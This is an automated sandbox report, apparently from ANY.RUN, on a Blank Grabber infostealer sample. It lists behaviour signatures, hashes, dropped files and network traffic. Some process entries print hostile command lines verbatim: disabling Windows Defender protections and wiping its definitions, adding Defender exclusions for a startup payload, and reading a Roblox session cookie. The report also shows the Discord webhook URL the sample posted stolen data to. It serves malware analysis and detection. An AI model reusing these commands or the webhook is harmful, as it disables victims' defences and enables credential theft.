File name:

Built.exe

Full analysis: https://app.any.run/tasks/65247d60-21c8-4ce4-8f3f-dc1ffef8a2f7
Verdict: Malicious activity
Threats:

Blank Grabber is an infostealer written in Python. It is designed to steal a wide array of data, such as browser login credentials, crypto wallets, Telegram sessions, and Discord tokens. It is an open-source malware, with its code available on GitHub and regularly receiving updates. Blank Grabber builder’s simple interface lets threat actors even with basic skills to deploy it and conduct attacks.

Analysis date: July 05, 2025, 22:23:26
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
blankgrabber
evasion
stealer
auto-startup
screenshot
discord
pyinstaller
susp-powershell
discordgrabber
generic
ims-api
upx
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32+ executable (GUI) x86-64, for MS Windows, 7 sections
MD5:

7FD687A278A4FB4A322D789B70D9CFB8

SHA1:

2367D5682E08186FDB9E381DE8A73DB863E37D90

SHA256:

5F80B7AC2383580A39A8C2E4F1965A9A6F76214CFDF7426B187539584CBBCF8F

SSDEEP:

98304:+C3CpWXh6A35Yp2mDB4K6qFtM4+EFovlPmRSvddzdzoqpGysfbXf+RsYVsncRkmp:xJy44a+CH7qXf4hwljdHt7e

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executing a file with an untrusted certificate

      • Built.exe (PID: 4828)
      • Built.exe (PID: 5236)
      • Built.exe (PID: 3688)
      • Built.exe (PID: 2992)
    • BlankGrabber has been detected

      • Built.exe (PID: 4828)
      • Built.exe (PID: 3688)
      • ‏    .scr (PID: 7584)
    • Adds path to the Windows Defender exclusion list

      • Built.exe (PID: 2992)
      • cmd.exe (PID: 6228)
      • cmd.exe (PID: 1156)
    • Antivirus name has been found in the command line (generic signature)

      • cmd.exe (PID: 1336)
    • Changes settings for sending potential threat samples to Microsoft servers

      • powershell.exe (PID: 4684)
    • Changes settings for real-time protection

      • powershell.exe (PID: 4684)
    • Changes Controlled Folder Access settings

      • powershell.exe (PID: 4684)
    • Changes settings for protection against network attacks (IPS)

      • powershell.exe (PID: 4684)
    • Changes Windows Defender settings

      • cmd.exe (PID: 1336)
      • cmd.exe (PID: 6228)
      • cmd.exe (PID: 1156)
    • Changes settings for reporting to Microsoft Active Protection Service (MAPS)

      • powershell.exe (PID: 4684)
    • Changes antivirus protection settings for downloading files from the Internet (IOAVProtection)

      • powershell.exe (PID: 4684)
    • Changes settings for checking scripts for malicious actions

      • powershell.exe (PID: 4684)
    • Create files in the Startup directory

      • Built.exe (PID: 2992)
    • Actions looks like stealing of personal data

      • Built.exe (PID: 2992)
    • Steals credentials from Web Browsers

      • Built.exe (PID: 2992)
    • Changes powershell execution policy (Bypass)

      • cmd.exe (PID: 3964)
    • Bypass execution policy to execute commands

      • powershell.exe (PID: 7272)
    • Resets Windows Defender malware definitions to the base version

      • MpCmdRun.exe (PID: 4572)
    • DISCORDGRABBER has been detected (YARA)

      • Built.exe (PID: 2992)
    • Steals Growtopia credentials and data (YARA)

      • Built.exe (PID: 2992)
    • BLANKGRABBER has been detected (SURICATA)

      • Built.exe (PID: 2992)
  • SUSPICIOUS

    • Process drops legitimate windows executable

      • Built.exe (PID: 4828)
      • Built.exe (PID: 3688)
      • Built.exe (PID: 2992)
      • ‏    .scr (PID: 7584)
    • Starts a Microsoft application from unusual location

      • Built.exe (PID: 4828)
      • Built.exe (PID: 5236)
      • Built.exe (PID: 3688)
      • Built.exe (PID: 2992)
    • Process drops python dynamic module

      • Built.exe (PID: 4828)
      • Built.exe (PID: 3688)
      • ‏    .scr (PID: 7584)
    • The process drops C-runtime libraries

      • Built.exe (PID: 4828)
      • Built.exe (PID: 3688)
      • ‏    .scr (PID: 7584)
    • Executable content was dropped or overwritten

      • Built.exe (PID: 4828)
      • Built.exe (PID: 3688)
      • Built.exe (PID: 2992)
      • ‏    .scr (PID: 7584)
      • csc.exe (PID: 3388)
    • Application launched itself

      • Built.exe (PID: 4828)
      • Built.exe (PID: 5236)
      • Built.exe (PID: 3688)
      • ‏    .scr (PID: 7584)
      • updater.exe (PID: 4860)
    • Reads security settings of Internet Explorer

      • Built.exe (PID: 5236)
    • Reads the date of Windows installation

      • Built.exe (PID: 5236)
    • Get information on the list of running processes

      • Built.exe (PID: 2992)
      • cmd.exe (PID: 6384)
      • cmd.exe (PID: 5992)
      • cmd.exe (PID: 4948)
      • cmd.exe (PID: 4312)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 1336)
      • cmd.exe (PID: 6228)
      • cmd.exe (PID: 1156)
      • cmd.exe (PID: 7108)
      • cmd.exe (PID: 3964)
      • cmd.exe (PID: 3740)
      • cmd.exe (PID: 7868)
      • cmd.exe (PID: 7176)
      • cmd.exe (PID: 8044)
    • Script disables Windows Defender's IPS

      • cmd.exe (PID: 1336)
    • Script disables Windows Defender's real-time protection

      • cmd.exe (PID: 1336)
    • Script adds exclusion path to Windows Defender

      • cmd.exe (PID: 6228)
      • cmd.exe (PID: 1156)
    • Starts CMD.EXE for commands execution

      • Built.exe (PID: 2992)
    • Found strings related to reading or modifying Windows Defender settings

      • Built.exe (PID: 2992)
    • Executes JavaScript directly as a command

      • cmd.exe (PID: 4540)
    • Uses WMIC.EXE to obtain Windows Installer data

      • cmd.exe (PID: 2216)
      • cmd.exe (PID: 5528)
      • cmd.exe (PID: 3876)
    • Accesses product unique identifier via WMI (SCRIPT)

      • WMIC.exe (PID: 1800)
      • WMIC.exe (PID: 2128)
    • Checks for external IP

      • Built.exe (PID: 2992)
      • svchost.exe (PID: 2200)
    • Uses WMIC.EXE to obtain a list of video controllers

      • cmd.exe (PID: 4932)
      • cmd.exe (PID: 6260)
      • cmd.exe (PID: 5184)
    • Accesses video controller name via WMI (SCRIPT)

      • WMIC.exe (PID: 4880)
      • WMIC.exe (PID: 1944)
      • WMIC.exe (PID: 1336)
    • Uses SYSTEMINFO.EXE to read the environment

      • cmd.exe (PID: 1328)
    • Starts application with an unusual extension

      • cmd.exe (PID: 6936)
      • cmd.exe (PID: 7456)
      • ‏    .scr (PID: 7584)
      • cmd.exe (PID: 8044)
      • cmd.exe (PID: 7656)
      • cmd.exe (PID: 7768)
      • cmd.exe (PID: 7884)
    • Base64-obfuscated command line is found

      • cmd.exe (PID: 3964)
    • The process bypasses the loading of PowerShell profile settings

      • cmd.exe (PID: 3964)
    • Uses NETSH.EXE to obtain data on the network

      • cmd.exe (PID: 6656)
    • BASE64 encoded PowerShell command has been detected

      • cmd.exe (PID: 3964)
    • Accesses antivirus product name via WMI (SCRIPT)

      • WMIC.exe (PID: 7180)
    • CSC.EXE is used to compile C# code

      • csc.exe (PID: 3388)
    • Captures screenshot (POWERSHELL)

      • powershell.exe (PID: 7272)
    • The executable file from the user directory is run by the CMD process

      • rar.exe (PID: 6796)
    • Possible usage of Discord/Telegram API has been detected (YARA)

      • Built.exe (PID: 2992)
    • Uses WMIC.EXE to obtain operating system information

      • cmd.exe (PID: 8032)
    • Accesses operating system name via WMI (SCRIPT)

      • WMIC.exe (PID: 7324)
    • Uses WMIC.EXE to obtain computer system information

      • cmd.exe (PID: 7852)
    • The process executes via Task Scheduler

      • updater.exe (PID: 4860)
  • INFO

    • The sample compiled with english language support

      • Built.exe (PID: 4828)
      • Built.exe (PID: 3688)
      • Built.exe (PID: 2992)
      • ‏    .scr (PID: 7584)
    • Reads the computer name

      • Built.exe (PID: 4828)
      • Built.exe (PID: 5236)
      • Built.exe (PID: 3688)
      • Built.exe (PID: 2992)
      • ‏    .scr (PID: 7584)
      • MpCmdRun.exe (PID: 4572)
      • updater.exe (PID: 4860)
    • Checks supported languages

      • Built.exe (PID: 4828)
      • Built.exe (PID: 5236)
      • Built.exe (PID: 3688)
      • Built.exe (PID: 2992)
      • tree.com (PID: 7196)
      • ‏    .scr (PID: 7584)
      • tree.com (PID: 7612)
      • ‏    .scr (PID: 7704)
      • tree.com (PID: 7728)
      • tree.com (PID: 7844)
      • tree.com (PID: 7996)
      • tree.com (PID: 8180)
      • MpCmdRun.exe (PID: 4572)
      • csc.exe (PID: 3388)
      • cvtres.exe (PID: 7576)
      • rar.exe (PID: 6796)
      • updater.exe (PID: 4860)
      • updater.exe (PID: 7520)
    • Create files in a temporary directory

      • Built.exe (PID: 4828)
      • Built.exe (PID: 5236)
      • Built.exe (PID: 3688)
      • Built.exe (PID: 2992)
      • ‏    .scr (PID: 7584)
      • ‏    .scr (PID: 7704)
      • cvtres.exe (PID: 7576)
      • csc.exe (PID: 3388)
      • rar.exe (PID: 6796)
      • MpCmdRun.exe (PID: 4572)
    • Process checks computer location settings

      • Built.exe (PID: 5236)
    • Reads Internet Explorer settings

      • mshta.exe (PID: 2800)
    • Reads security settings of Internet Explorer

      • WMIC.exe (PID: 1800)
      • WMIC.exe (PID: 4880)
      • WMIC.exe (PID: 1944)
      • WMIC.exe (PID: 7180)
      • WMIC.exe (PID: 7324)
      • WMIC.exe (PID: 1480)
      • WMIC.exe (PID: 2128)
      • WMIC.exe (PID: 1336)
    • Creates files in the program directory

      • Built.exe (PID: 2992)
    • Launching a file from the Startup directory

      • Built.exe (PID: 2992)
    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 4684)
      • powershell.exe (PID: 3672)
      • powershell.exe (PID: 2180)
    • Checks the directory tree

      • tree.com (PID: 7196)
      • tree.com (PID: 7612)
      • tree.com (PID: 7728)
      • tree.com (PID: 7844)
      • tree.com (PID: 7996)
      • tree.com (PID: 8180)
    • The Powershell gets current clipboard

      • powershell.exe (PID: 7188)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 3672)
      • powershell.exe (PID: 4684)
      • powershell.exe (PID: 2180)
      • powershell.exe (PID: 6800)
      • powershell.exe (PID: 1068)
    • Manual execution by a user

      • ‏    .scr (PID: 7584)
    • Reads the machine GUID from the registry

      • csc.exe (PID: 3388)
      • rar.exe (PID: 6796)
    • Displays MAC addresses of computer network adapters

      • getmac.exe (PID: 7700)
    • PyInstaller has been detected (YARA)

      • Built.exe (PID: 3688)
      • Built.exe (PID: 2992)
    • Found Base64 encoded reflection usage via PowerShell (YARA)

      • Built.exe (PID: 2992)
    • UPX packer has been detected

      • Built.exe (PID: 2992)
    • Checks proxy server information

      • slui.exe (PID: 6400)
    • Reads the software policy settings

      • slui.exe (PID: 6400)
    • Process checks whether UAC notifications are on

      • updater.exe (PID: 4860)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

ims-api

(PID) Process(2992) Built.exe
Discord-Webhook-Tokens (1)1391181249309048863/DX6K9950IVs1ZcdYvFPaq3RbSg7fVcMHyxX11RP8ARUx92O4Dcbf7iTpVLyAix_WYz58
Discord-Info-Links
1391181249309048863/DX6K9950IVs1ZcdYvFPaq3RbSg7fVcMHyxX11RP8ARUx92O4Dcbf7iTpVLyAix_WYz58
Get Webhook Infohttps://discord.com/api/webhooks/1391181249309048863/DX6K9950IVs1ZcdYvFPaq3RbSg7fVcMHyxX11RP8ARUx92O4Dcbf7iTpVLyAix_WYz58
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (87.3)
.exe | Generic Win/DOS Executable (6.3)
.exe | DOS Executable Generic (6.3)

EXIF

EXE

MachineType: AMD AMD64
TimeStamp: 2025:07:05 22:19:14+00:00
ImageFileCharacteristics: Executable, Large address aware
PEType: PE32+
LinkerVersion: 14.43
CodeSize: 174592
InitializedDataSize: 96768
UninitializedDataSize: -
EntryPoint: 0xd0d0
OSVersion: 6
ImageVersion: -
SubsystemVersion: 6
Subsystem: Windows GUI
FileVersionNumber: 10.0.19041.1
ProductVersionNumber: 10.0.19041.1
FileFlagsMask: 0x003f
FileFlags: (none)
FileOS: Windows NT 32-bit
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: English (U.S.)
CharacterSet: Unicode
CompanyName: Microsoft Corporation
FileDescription: File Transfer Program
FileVersion: 10.0.19041.1 (WinBuild.160101.0800)
InternalName: ftp.exe
LegalCopyright: © Microsoft Corporation. All rights reserved.
OriginalFileName: ftp.exe
ProductName: Microsoft® Windows® Operating System
ProductVersion: 10.0.19041.1
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
243
Monitored processes
116
Malicious processes
9
Suspicious processes
4

Behavior graph

Click at the process to see the details
start #BLANKGRABBER built.exe built.exe no specs #BLANKGRABBER built.exe #BLANKGRABBER built.exe cmd.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs tasklist.exe no specs powershell.exe no specs mshta.exe no specs wmic.exe no specs cmd.exe no specs conhost.exe no specs reg.exe no specs cmd.exe no specs conhost.exe no specs reg.exe no specs cmd.exe no specs conhost.exe no specs svchost.exe wmic.exe no specs cmd.exe no specs conhost.exe no specs wmic.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs cmd.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs tasklist.exe no specs tasklist.exe no specs cmd.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs systeminfo.exe no specs tasklist.exe no specs wmic.exe no specs powershell.exe no specs tree.com no specs powershell.exe no specs netsh.exe no specs cmd.exe no specs conhost.exe no specs #BLANKGRABBER ‏    .scr tree.com no specs cmd.exe no specs conhost.exe no specs ‏    .scr no specs tree.com no specs cmd.exe no specs conhost.exe no specs tree.com no specs cmd.exe no specs conhost.exe no specs tree.com no specs cmd.exe no specs conhost.exe no specs tiworker.exe no specs tree.com no specs mpcmdrun.exe no specs csc.exe cmd.exe no specs conhost.exe no specs cvtres.exe no specs powershell.exe no specs cmd.exe no specs conhost.exe no specs getmac.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs cmd.exe no specs conhost.exe no specs rar.exe no specs cmd.exe no specs conhost.exe no specs wmic.exe no specs cmd.exe no specs conhost.exe no specs wmic.exe no specs cmd.exe no specs conhost.exe no specs wmic.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs cmd.exe no specs conhost.exe no specs wmic.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs slui.exe updater.exe no specs updater.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
424\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1068powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITYC:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
1156C:\WINDOWS\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‏    .scr'"C:\Windows\System32\cmd.exeBuilt.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
1180\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1232powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIERC:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
1328\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1328C:\WINDOWS\system32\cmd.exe /c "systeminfo"C:\Windows\System32\cmd.exeBuilt.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
1336C:\WINDOWS\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"C:\Windows\System32\cmd.exeBuilt.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
1336wmic path win32_VideoController get nameC:\Windows\System32\wbem\WMIC.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
WMI Commandline Utility
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\wbem\wmic.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\framedynos.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
1480wmic computersystem get totalphysicalmemoryC:\Windows\System32\wbem\WMIC.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
WMI Commandline Utility
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\wbem\wmic.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\framedynos.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
Total events
63 419
Read events
63 416
Write events
3
Delete events
0

Modification events

(PID) Process:(2992) Built.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Multimedia\DrawDib
Operation:writeName: 1280x720x32(BGR 0)
Value:
31,31,31,31
(PID) Process:(8104) TiWorker.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing
Operation:writeName:SessionIdHigh
Value:
31190523
(PID) Process:(8104) TiWorker.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing
Operation:writeName:SessionIdLow
Value:
Executable files
188
Suspicious files
16
Text files
57
Unknown types
0

Dropped files

PID
Process
Filename
Type
4828Built.exeC:\Users\admin\AppData\Local\Temp\_MEI48282\_bz2.pydexecutable
MD5:7727659BB076D34CF0F0AD1C1FC968E6
SHA256:B9A2152A844FB58FB294DC33EFD3BD2C266DEF470BFE4B4EDACFB75DD2E3ECED
4828Built.exeC:\Users\admin\AppData\Local\Temp\_MEI48282\VCRUNTIME140.dllexecutable
MD5:862F820C3251E4CA6FC0AC00E4092239
SHA256:36585912E5EAF83BA9FEA0631534F690CCDC2D7BA91537166FE53E56C221E153
4828Built.exeC:\Users\admin\AppData\Local\Temp\_MEI48282\_queue.pydexecutable
MD5:051B0B941192073345D52298F0129B1F
SHA256:04CA88870ADE6C654490268D93360A61965E8CA799F2D52F6C99948B317BDE4D
4828Built.exeC:\Users\admin\AppData\Local\Temp\_MEI48282\_ctypes.pydexecutable
MD5:9527B566DDA0B94F93F6DEF63BAAC6BB
SHA256:456C82D5B49AF25839A62E933794DFEC3D2AFDEF10D23A81FAD94B53B488FCC0
4828Built.exeC:\Users\admin\AppData\Local\Temp\_MEI48282\_sqlite3.pydexecutable
MD5:9BF44FB475F1732DF8C14B323CC5EC58
SHA256:47EB79D84017ED5C4933622166DC0F003A59FF5556998F23385BE4D6C06B165A
4828Built.exeC:\Users\admin\AppData\Local\Temp\_MEI48282\_hashlib.pydexecutable
MD5:69DA0E0688C8D2B1B6801E63053C3412
SHA256:12332EB2C681511BC99BFF5A9B14D935933585199F10E57C0F37EBDAA6519ECE
4828Built.exeC:\Users\admin\AppData\Local\Temp\_MEI48282\_lzma.pydexecutable
MD5:7A4DAD239486B02FF5106141D7ABA3A7
SHA256:10856DBFD8C956E24ED04F6D533B8C03A2131A99F3AE427FACD7BEE9AD98802A
4828Built.exeC:\Users\admin\AppData\Local\Temp\_MEI48282\_overlapped.pydexecutable
MD5:064D1F8509569CD5E656472D5ACC336E
SHA256:C2BDD26FEC75AF0B36F43607F8B1B27A13C4CD0864CA095E9A0C2EBB173F79AF
4828Built.exeC:\Users\admin\AppData\Local\Temp\_MEI48282\_multiprocessing.pydexecutable
MD5:A5571C799D57313B0D4DB4ACB1C835D4
SHA256:08653E4E3A8709AF86B8EBCDBA2B2C133F43856281112F44C8626ECC99B9E92B
4828Built.exeC:\Users\admin\AppData\Local\Temp\_MEI48282\_socket.pydexecutable
MD5:301875ACE6D58AB5737871A14C163A74
SHA256:B3895E8D9389DC883EF05898D3E3E49BADC6D5E6A9433EA6CA315E2513AD88AF
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
11
TCP/UDP connections
25
DNS requests
11
Threats
9

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5944
MoUsoCoreWorker.exe
GET
200
2.16.168.114:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
1268
svchost.exe
GET
200
2.16.168.114:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
1268
svchost.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
5944
MoUsoCoreWorker.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
2992
Built.exe
GET
200
208.95.112.1:80
http://ip-api.com/line/?fields=hosting
unknown
whitelisted
GET
204
142.250.185.67:443
https://gstatic.com/generate_204
unknown
2992
Built.exe
GET
200
208.95.112.1:80
http://ip-api.com/json/?fields=225545
unknown
whitelisted
POST
500
40.91.76.224:443
https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail
unknown
xml
512 b
whitelisted
POST
404
162.159.137.232:443
https://discord.com/api/webhooks/1391181249309048863/DX6K9950IVs1ZcdYvFPaq3RbSg7fVcMHyxX11RP8ARUx92O4Dcbf7iTpVLyAix_WYz58
unknown
binary
45 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:137
whitelisted
4
System
192.168.100.255:138
whitelisted
1268
svchost.exe
2.16.168.114:80
crl.microsoft.com
Akamai International B.V.
RU
whitelisted
5944
MoUsoCoreWorker.exe
2.16.168.114:80
crl.microsoft.com
Akamai International B.V.
RU
whitelisted
1268
svchost.exe
95.101.149.131:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted
95.101.149.131:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted
5944
MoUsoCoreWorker.exe
95.101.149.131:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted
6024
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
1268
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 40.127.240.158
whitelisted
google.com
  • 142.250.186.110
whitelisted
crl.microsoft.com
  • 2.16.168.114
  • 2.16.168.124
whitelisted
www.microsoft.com
  • 95.101.149.131
whitelisted
blank-nbkxw.in
unknown
ip-api.com
  • 208.95.112.1
whitelisted
gstatic.com
  • 172.217.18.99
whitelisted
discord.com
  • 162.159.138.232
  • 162.159.128.233
  • 162.159.135.232
  • 162.159.136.232
  • 162.159.137.232
whitelisted
activation-v2.sls.microsoft.com
  • 40.91.76.224
whitelisted
self.events.data.microsoft.com
  • 20.189.173.3
whitelisted

Threats

PID
Process
Class
Message
Device Retrieving External IP Address Detected
INFO [ANY.RUN] External IP Check (ip-api .com)
Device Retrieving External IP Address Detected
ET INFO External IP Lookup ip-api.com
Device Retrieving External IP Address Detected
ET INFO External IP Lookup Domain in DNS Lookup (ip-api .com)
Misc activity
ET INFO Observed Discord Domain in DNS Lookup (discord .com)
Misc activity
ET INFO Observed Discord Domain (discord .com in TLS SNI)
Device Retrieving External IP Address Detected
ET INFO External IP Lookup ip-api.com
Misc activity
ET INFO Observed Discord Service Domain (discord .com) in TLS SNI
Misc activity
ET INFO Discord Chat Service Domain in DNS Lookup (discord .com)
A Network Trojan was detected
STEALER [ANY.RUN] BlankGrabber (SkochGrabber) Generic External IP Check
No debug info